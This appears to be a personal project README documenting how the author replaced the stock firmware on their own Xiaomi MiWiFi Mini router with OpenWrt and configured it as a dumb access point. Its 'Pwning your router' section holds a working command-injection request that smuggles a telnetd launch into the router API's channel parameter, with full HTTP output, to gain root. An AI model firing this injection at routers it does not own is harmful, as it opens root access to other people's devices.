# Installing OpenWrt on XiaoMi MiWiFi Mini

Because the official firmware release has ceased and there are security vulnerabilities available I need to install an alternate firmware to the device.

This project documents the process for reference.

[![CI status badge](https://gitlab.com/brlin/miwifi-mini-openwrt/badges/main/pipeline.svg "CI Status")](https://gitlab.com/brlin/miwifi-mini-openwrt/-/commits/main)

![OpenWrt main view](screenshots/openwrt-main-view.png "OpenWrt main view")

## Table of contents

[TOC]

## Environment details

```plantuml
title Home network planning

cloud "Internet" as internet

frame "Home" as home{
    node "ISP modem+router\n192.168.128.254" as isp_router{
        portin "WAN\n1.2.3.4" as isp_router_wan_port

        component "bridge\n192.168.128.0/24" as isp_router_bridge
        component "DNS service" as isp_router_dns_service
        component "DHCP service" as isp_router_dhcp_service

        portout "LAN1" as isp_router_lan1_port
        portout "LAN2" as isp_router_lan2_port
        portout "LAN3" as isp_router_lan3_port
        portout "LAN4" as isp_router_lan4_port
    }

    node "MiWiFi Router Mini\n192.168.128.253\n(Static lease)" as ap{
        portin "WAN" as ap_wan_port

        component "bridge\n192.168.128.0/24" as ap_bridge

        portout "LAN1" as ap_lan1_port
        portout "LAN2" as ap_lan2_port
        portout "Wi-Fi\n2.4GHz" as ap_wifi_2ghz_port
        portout "Wi-Fi\n5GHz" as ap_wifi_5ghz_port
    }
    node "Client device 1\n192.168.128.1" as client_device1
    node "Client device 2\n192.168.128.2" as client_device2
    node "Client device 3\n192.168.128.3" as client_device3
}

isp_router_wan_port -up-> internet: Access

isp_router_lan1_port -up-> isp_router_bridge: Bind
isp_router_lan2_port -up-> isp_router_bridge: Bind
isp_router_lan3_port -up-> isp_router_bridge: Bind
isp_router_lan4_port -up-> isp_router_bridge: Bind

ap_wan_port -up-> isp_router_lan4_port: Connect
ap_lan1_port -up-> ap_bridge: Bind
ap_lan2_port -up-> ap_bridge: Bind
ap_wifi_2ghz_port -up-> ap_bridge: Bind
ap_wifi_5ghz_port -up-> ap_bridge: Bind

ap_bridge ... isp_router_bridge: Connected
ap_wan_port -down--> ap_bridge: Bind
isp_router_bridge -up-> isp_router_wan_port: NAT

isp_router_lan1_port -[hidden]r-> isp_router_lan2_port
isp_router_lan2_port -[hidden]> isp_router_lan3_port
isp_router_lan3_port -[hidden]r-> isp_router_lan4_port

client_device1 .up.> ap_wifi_5ghz_port: Connect
client_device2 -up-> ap_lan1_port: Connect
client_device3 -up-> isp_router_lan1_port: Connect

isp_router_dns_service -> isp_router_bridge: listen
isp_router_dhcp_service -left-> isp_router_bridge: listen
```

### Current configuration

#### Device firmware

XiaoMi stock firmware 3.0.0(likely TW variant, but unsure)

#### Device setup

Bridge mode(LAN uses WAN's subnet and DHCP service), or "dumb access point(AP)"

#### Device IP address

192.168.128.253(a static lease is set in the upstream WAN router)

#### Local system's IP address

192.168.128.22(dynamically assigned by the upstream WAN router)

### Expected configuration

#### Device firmware

OpenWrt 22.03.3 official release, with the following firmware file checksums:

```shell
$ sha256sum openwrt-22.03.3-ramips-mt7620-xiaomi_miwifi-mini-*
be98e8e51baccf2692409b5d51d427aafc92f8981ef7564a5f057d53efb3acaf  openwrt-22.03.3-ramips-mt7620-xiaomi_miwifi-mini-initramfs-kernel.bin
10fe3204e9fb76ef39463a55cd305970efc95dc561bc15e5b59d9baa6a2bb8f3  openwrt-22.03.3-ramips-mt7620-xiaomi_miwifi-mini-squashfs-sysupgrade.bin
```

#### Device setup

Bridge mode(LAN uses WAN's subnet and DHCP service), or "dumb access point(AP)"

## Prerequisites

* A Linux user session(I use Ubuntu 22.04 AMD64, but any recent ones should do)
* Wired, direct connection to the router

## Installation

### Fetching required resources

1. Download device's "Linux kernel with minimal file system" and "Sysupgrade" firmware images to the local system from the [OpenWrt Firmware Selector page](https://firmware-selector.openwrt.org/?version=22.03.3&target=ramips%2Fmt7620&id=xiaomi_miwifi-mini).

   **NOTE:** "Linux kernel with minimal file system" firmware image is used for first installation of OpenWrt, while "Sysupgrade" firmware image is for converting the first installation system to a full-fledged one.

1. Verify file checksum to avoid tampering

### Pwning your router

1. Login and acquire the `stok` auth token:

    ```secret
    1ebe7b241fbcc33d6282df7f90cc5d0b
    ```

1. Use command injection exploit to start the Telnet service

    ```sh
    $ curl \
        --verbose \
        'http://192.168.128.253/cgi-bin/luci/;stok=1ebe7b241fbcc33d6282df7f90cc5d0b/api/xqnetwork/set_wifi_ap?ssid=whatever&encryption=NONE&enctype=NONE&channel=1%3B%2Fusr%2Fsbin%2Ftelnetd'
    *   Trying 192.168.128.253:80...
    * Connected to 192.168.128.253 (192.168.128.253) port 80 (#0)
    > GET /cgi-bin/luci/;stok=1ebe7b241fbcc33d6282df7f90cc5d0b/api/xqnetwork/set_wifi_ap?ssid=whatever&encryption=NONE&enctype=NONE&channel=1%3B%2Fusr%2Fsbin%2Ftelnetd HTTP/1.1
    > Host: 192.168.128.253
    > User-Agent: curl/7.81.0
    > Accept: */*
    >
    * Mark bundle as not supporting multiuse
    < HTTP/1.1 200 OK
    < Tx-Server: MiXr
    < Date: Tue, 27 Jul 2021 09:01:30 GMT
    < Content-Type: text/html; charset=utf-8
    < Content-Length: 62
    < Connection: close
    < Cache-Control: no-cache
    < Expires: Thu, 01 Jan 1970 00:00:01 GMT
    < MiCGI-Switch: 1 1
    < MiCGI-Client-Ip: 192.168.128.22
    < MiCGI-Host: 192.168.128.253
    < MiCGI-Http-Host: 192.168.128.253
    < MiCGI-Server-Ip: 192.168.128.253
    < MiCGI-Server-Port: 80
    < MiCGI-Status: CGI
    < MiCGI-Preload: no
    <
    * Closing connection 0
    {"msg":"未能连接到指定WiFi(Probe timeout)","code":1616}
    ```

1. Acquire the factory default root password using [the MiWiFi SSH Password Calculator](https://miwifi.dev/ssh)
1. Acquire device text terminal via Telnet using _root_ user and the acquired root password

    ```sh
    telnet 192.168.128.253
    ```

   You should able to acquire the root shell with the "XiaoQiang" hostname

### Send the "Linux kernel with minimal file system" firmware image from the local system to the device

**NOTE:** In contrary to the official guide, the firmware image is not directly downloaded on the device due to the stock firmware didn't provide the necessary utility to compute the firmware file's SHA-256 checksum.

1. In the local system, start a TCP tunnel session with the firmwarae image's data redirected to netcat's standard input:

    ```sh
    local $ nc \
        -l 12345 \
        <openwrt-22.03.3-ramips-mt7620-xiaomi_miwifi-mini-initramfs-kernel.bin
    ```

1. In the device text terminal, change the working directory to the /tmp in-primary-memory tmpfs filesystem directory:

    ```sh
    device $ cd /tmp
    ```

1. In the local system, calculate the firmware image MD5 checksum:

    ```sh
    local $ md5sum \
        openwrt-22.03.3-ramips-mt7620-xiaomi_miwifi-mini-initramfs-kernel.bin
    79a4011bb2f8a5bfe063153f18399ff7  openwrt-22.03.3-ramips-mt7620-xiaomi_miwifi-mini-initramfs-kernel.bin
    ```

1. In the device text terminal, calulate the firmware image MD5 checksum:

    ```sh
    device $ md5sum \
        openwrt-22.03.3-ramips-mt7620-xiaomi_miwifi-mini-initramfs-kernel.bin
    79a4011bb2f8a5bfe063153f18399ff7  openwrt-22.03.3-ramips-mt7620-xiaomi_miwifi-mini-initramfs-kernel.bin
    ```

    Verify that the checksum matches with the previously computed one.

### Install OpenWrt minimal firmware to the device

1. Flash the firmware and automatically reboot upon flash completion

    ```sh
    mtd -r write \
        openwrt-22.03.3-ramips-mt7620-xiaomi_miwifi-mini-initramfs-kernel.bin \
        OS1
    ```

1. The OpenWrt default configuration creates a new 192.168.1.0/24 subnet in NAT configuration, the setup site is availble at <http://192.168.1.1/>

### Install OpenWrt full-fledged firmware to device

1. Open System > Backup / Flash Firmware page(<https://192.168.128.253/cgi-bin/luci/admin/system/flash>)
1. At the "Flash new firmware image" section, click "Flash image" and select the sysupgrade firmware image file
1. The device will reboot and will be up in the next few minutes

## Configuration

### Enabling HTTPS

To elimitate possibility of the admin password being sniffed out, enabling HTTPS at System > Administration > HTTP(S) Access(<https://192.168.1.1/cgi-bin/luci/admin/system/admin/uhttpd>)

At the HTTPS certificate not trusted web browser warning screen(Firefox: Advanced... > View certificates), record the fingerprints of the HTTPS certificate for future verifications(I stored them along with the login password in Bitwarden) and add ther server into the browser whitelist.

### Set administration password

Set the administrator password via System > Administration > Router Password(<https://192.168.1.1/cgi-bin/luci/admin/system/admin>) to avoid unprotected device configuration interface

### Activating wireless networks

Enabling wireless network at Network > Wireless(<https://192.168.1.1/cgi-bin/luci/admin/network/wireless>), this allows possible configuration recovery via accessing the config site using Wi-Fi

In each Wi-Fi configuration page, apply the following settings:

* In the Device Configuration > General Setup tab, set the Channel drop-down box in the Operating frequency field to `auto`
* In the Device Configuration > Advanced Settings tab, set the Country Code to `TW - Taiwan`(or other region codes your jurisdiction allows)
* In the Interface Configuration > Wireless Security tab, set the Encryption field to `WPA2-PSK/WPA3-SAE Mixed Mode`

### Bridging LAN and WAN together(dumb AP configuration)

In factory default LAN network is isolated from WAN network using integrated VLAN capability, we need to merge the VLANs so that devices in the WAN network can access those in the LAN network(and vice versa).

**NOTE:** Disable VLAN altogether may not work as you might expected due to how WAN/LAN is implemented in the hardware, in the end the configuration is not attempted.  
**NOTE:** Do NOT hit "Save & Apply" button until instructed.

1. Open Network > Switch page(<https://192.168.1.1/cgi-bin/luci/admin/network/switch>)
1. Remove WAN VLAN configuration(VLAN ID=2)
1. Set ID=1 VLAN configuration as following:

    | VLAN ID | Description | CPU<br>(eth0) | LAN 1 | LAN 2 | WAN |
    | :-: | :-: | :-: | :-: | :-: | :-: |
    | 1 | Dumb AP | tagged | untagged | untagged | untagged |
1. Save(without apply) VLAN settings
1. Open Network > Interfaces page(<https://192.168.1.1/cgi-bin/luci/admin/network/network>) and delete the "WAN" interface
1. Edit the LAN interface:
    + In General Settings, set Protocol to DHCP client
    + In DHCP Server > General Setup tab, toggle the "Ignore interface" checkbox
    + In DHCP Server > IPv6 Settings, set the "RA-Service", "DHCPv6-Service", "NDP-Proxy" field values to `disabled`
1. In the Network > Interfaces > Devices page(<https://192.168.1.1/cgi-bin/luci/admin/network/network>), configure the br-lan bridge device:
    + In the "General device options" tab, edit the "Bridge ports" field to include both "eth0.1" and "eth0.2" ports
    + In the "General device options" tab, untoggle the "Enable IPv6" checkbox

   In all other devices' configuration page, untoggle the devices' "Enable IPv6" checkboxes as well.
1. In the Network > DHCP and DNS page(<https://192.168.1.1/cgi-bin/luci/admin/network/dhcp>), set the following fields:
    + Set the value of the "Local server" field to `/internal/`
    + Set the value of the "Local domain" field to `internal`
1. Hit the "Save & Apply" button and in 90 seconds restart local system ethernet connection to acquire the new WAN address and relogin the configuration page(<https://192.168.128.253>) to save the settings permanently
1. In System > Startup page(<https://192.168.128.253/cgi-bin/luci/admin/system/startup>), disable the following unused services:
    + dnsmasq
    + firewall
    + odhcpd

   In the Local Startup tab, merge the following scriptlet to apply changes permanently:

    ```sh
    # these services do not run on dumb APs
    # https://openwrt.org/docs/guide-user/network/wifi/dumbap#disable_daemons_persistently
    for service in firewall dnsmasq odhcpd; do
        if "/etc/init.d/${service}" enabled; then
            "/etc/init.d/${service}" disable
            "/etc/init.d/${service}" stop
        fi
    done
    ```

### Install common utilities

1. In "System > Software" configuration page(<https://192.168.128.253/cgi-bin/luci/admin/system/opkg>), click the "Update lists..." action button
1. Install the following packages:

    + htop
    + tmux
    + tree

### Install localization

1. In "System > Software" configuration page(<https://192.168.128.253/cgi-bin/luci/admin/system/opkg>), click the "Update lists..." action button
1. Install the following packages:

    + luci-i18n-base-zh-tw  
      For Taiwanese Chinese localization support for the basic interfaces
    + luci-i18n-opkg-zh-tw  
      For Taiwanese Chinese localization support for the software management interface

## Related operations

### Dumping and sending kernel log to local system when only Telnet session is available

1. At the local system, run the following command to open a TCP netcat(nc) tunnel that redirects it output to a file:

    ```sh
    nc \
        -l 12345 \
        >dmesg.out.gz
    ```

1. Acquire device text terminal session

    ```sh
    telnet 192.168.128.253
    ```

1. Dump kernel messages, compress it using Gzip, and send it via a TCP tunnel connection to the local system

    ```sh
    device:/tmp# dmesg \
        | gzip \
        | nc 192.168.128.22 12345
    ```

   In this case no flash memory or primary memory will be consumed by the kernel message dump.

## Licensing

Unless otherwise noted, this product is licensed under the [4.0 International version of the Creative Commons — Attribution-ShareAlike license](https://creativecommons.org/licenses/by-sa/4.0/), or any of its more recent versions you would prefer.

This work complies to the [REUSE Specification](https://reuse.software/spec/), refer [REUSE - Make licensing easy for everyone](https://reuse.software/) for info regarding the licensing of this product.

## Reference

* [[OpenWrt Wiki] Xiaomi Mi WiFi Mini](https://openwrt.org/toh/xiaomi/miwifi_mini)  
  Official mode-specific wiki article
* [小米 MIUI ROM 官方刷機包下載](https://mirom.ezbox.idv.tw/)  
  Unofficial firmware image download site
* [[OpenWrt Wiki] Wireless Access Point / Dumb Access Point](https://openwrt.org/docs/guide-user/network/wifi/dumbap)
